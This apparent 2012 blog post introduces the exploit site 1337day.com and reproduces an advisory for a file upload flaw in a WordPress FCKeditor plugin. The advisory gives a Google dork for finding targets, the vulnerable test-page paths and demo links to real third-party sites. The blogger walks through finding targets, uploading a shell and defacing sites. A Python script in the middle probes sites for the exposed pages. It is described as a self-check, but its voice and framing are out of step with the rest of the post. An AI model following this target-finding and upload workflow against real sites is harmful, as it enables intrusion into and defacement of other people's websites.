Thursday, 5 April 2012

Let's Get to Know 1337day.com

What is 1337day.com? 1337day.com is a site that collects all kinds of vulnerabilities:

in websites, software, operating systems and much more. It is very useful for

penetration testers ("pentesters" for short), and we can also use it to check the security level of our own website.

OK, here I will give an example, using the exploit below.




####
# Exploit Title: WordPress deans with pwwangs code plugin for wordpress (FCKeditor) Remote File Upload
# Author: T0x!c
# Date : 28/03/2012
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
# Download: http://wordpress.org...-for-wordpress/
# Version: 1.0.0
# Tested on: [Windows Xp]
####

[ Vulnerable File ]

http://127.0.0.1/wp-...uploadtest.html
or
http://127.0.0.1/wp-...ctors/test.html

[ Shell ]

http://127.0.0.1/Use...es/YourFile.txt

# Demo :
http://cougardating....pload/test.html
http://www.cereuswom...uploadtest.html
https://scandlearn.c...ctors/test.html
http://blog.nextleve...tors/test.html#

=================================**AlgeriansHackers**==================================
# Greets To : KedAns-Dz * Caddy-Dz * Kha&miX * Jago-dz * Amine Msd * Kalashinkov *
(exploit-id.com) , (1337day.com) , (dis9.com) , (Dz-Team.biz)
=======================================================================================



The exploit above states that the FCKeditor bundled in this WordPress plugin (Deans FCKeditor with PWWangs Code, version 1.0.0) has a file upload vulnerability.

It also gives a PoC [Proof of Concept]; OK, anthrax will explain how to read the PoC.

First, it tells us to find target websites with a Google dork. The dork is this:


inurl:"plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"


Once we have found such a website, we test whether it is vulnerable or not by requesting a path like this:


www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html


or


www.site.com/wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html



If that page loads and gives us a place to upload something, the website is very likely vulnerable:

an attacker can use it to upload a shell, deface pages and so on. Note that the test page itself is only an HTML form; the file is actually handled by the connector script the form posts to, so the upload only succeeds if that connector is enabled behind it.
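The "test whether the site is vulnerable" step above can be automated for a site you are authorized to check, for example your own WordPress install. The script below is an added example written for this post; it is not the advisory author's code and not part of the plugin. It requests the two paths from the PoC and, rather than trusting an HTTP 200 alone (many WordPress themes answer unknown paths with a 200 "not found" page), looks for the string "FCKeditor" in the body, which is my assumption about what the stock test pages contain. The fetch function is injectable so the classification logic runs offline against constructed responses.

```python
"""Probe a WordPress site for the two FCKeditor connector test pages named in the
PoC above. Added example, not code from the original post or the advisory.

Assumptions (mine, not the page's): the genuine FCKeditor test pages contain the
string "FCKeditor" in their HTML, and a theme's "not found" page served with
HTTP 200 does not.
"""
import urllib.error
import urllib.request
from urllib.parse import urljoin

# The two relative paths copied from the advisory's [ Vulnerable File ] section.
PLUGIN_DIR = "wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/"
PROBE_PATHS = (
    PLUGIN_DIR + "fckeditor/editor/filemanager/connectors/uploadtest.html",
    PLUGIN_DIR + "filemanager/connectors/test.html",
)

# Assumed marker for the genuine FCKeditor test pages (matched case-insensitively).
PAGE_MARKER = b"fckeditor"


def classify(status, body):
    """Classify one probe result.

    'exposed' - HTTP 200 and the body looks like the FCKeditor test page
    'soft404' - HTTP 200 but the body does not look like it (theme "not found" page)
    'absent'  - any other status, or no response at all
    """
    if status != 200:
        return "absent"
    if PAGE_MARKER in body.lower():
        return "exposed"
    return "soft404"


def http_get(url, timeout=10):
    """Fetch url; return (status, first 64 KiB of body). Errors map to (None, b'')."""
    req = urllib.request.Request(url, headers={"User-Agent": "fck-connector-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536)
    except urllib.error.HTTPError as err:      # 403/404/500 still carry a status code
        return err.code, err.read(65536)
    except (urllib.error.URLError, OSError):   # DNS failure, timeout, connection refused
        return None, b""


def check_site(base_url, fetch=http_get):
    """Probe both advisory paths under base_url; return {path: verdict}.

    `fetch` is injectable so the logic can be exercised with canned responses.
    """
    root = base_url.rstrip("/") + "/"
    return {path: classify(*fetch(urljoin(root, path))) for path in PROBE_PATHS}


def is_exposed(verdicts):
    """True if any probe came back 'exposed'."""
    return any(v == "exposed" for v in verdicts.values())


if __name__ == "__main__":
    import sys

    for site in sys.argv[1:]:
        verdicts = check_site(site)
        for path, verdict in verdicts.items():
            print(f"{verdict:8} {site.rstrip('/')}/{path}")
        print("RESULT:", "EXPOSED" if is_exposed(verdicts) else "not exposed", site)
```

Run it as `python check_fck.py https://your-site.example/` (file name is my choice). An "exposed" verdict means the test form is reachable, which is exactly what the PoC checks; it does not by itself prove the connector behind the form accepts uploads. On a site you own, the fix is to remove the plugin or at least delete the editor's test pages and connector scripts, since nothing in WordPress needs them.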

Below are websites that are vulnerable according to the PoC above.




OK, that is all for now; next time I want to share more great stuff!
